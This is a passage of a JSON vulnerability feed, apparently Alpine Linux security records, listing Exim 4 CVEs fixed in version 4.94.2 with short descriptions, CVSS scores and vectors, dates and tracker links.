"2022-06-28T14:11:00", "id": "ALPINE:CVE-2020-28020", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F ''\" is mishandled by parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28016", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-10T18:40:00", "id": "ALPINE:CVE-2020-28016", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28008", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-10T20:17:00", "id": "ALPINE:CVE-2020-28008", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28014", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28014", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28026", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28026", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28007", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-10T20:17:00", "id": "ALPINE:CVE-2020-28007", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28012", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28012", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28023", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-10T16:15:00", "id": "ALPINE:CVE-2020-28023", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28017", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2022-10-04T15:02:00", "id": "ALPINE:CVE-2020-28017", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28019", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-10T17:01:00", "id": "ALPINE:CVE-2020-28019", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28018", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-26T19:34:00", "id": "ALPINE:CVE-2020-28018", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28025", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-10T16:11:00", "id": "ALPINE:CVE-2020-28025", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles \"-F '.('\" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28013", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-10T18:43:00", "id": "ALPINE:CVE-2020-28013", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28013", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28010", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-12-03T19:59:00", "id": "ALPINE:CVE-2020-28010", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28010", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28011", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-10T19:28:00", "id": "ALPINE:CVE-2020-28011", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28024", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2022-06-28T14:11:00", "id": "ALPINE:CVE-2020-28024", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28022", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2022-06-28T14:11:00", "id": "ALPINE:CVE-2020-28022", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28015", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-10T18:08:00", "id": "ALPINE:CVE-2020-28015", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2021-27216", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2022-06-28T14:11:00", "id": "ALPINE:CVE-2021-27216", "href": "https://security.alpinelinux.org/vuln/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28021", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": 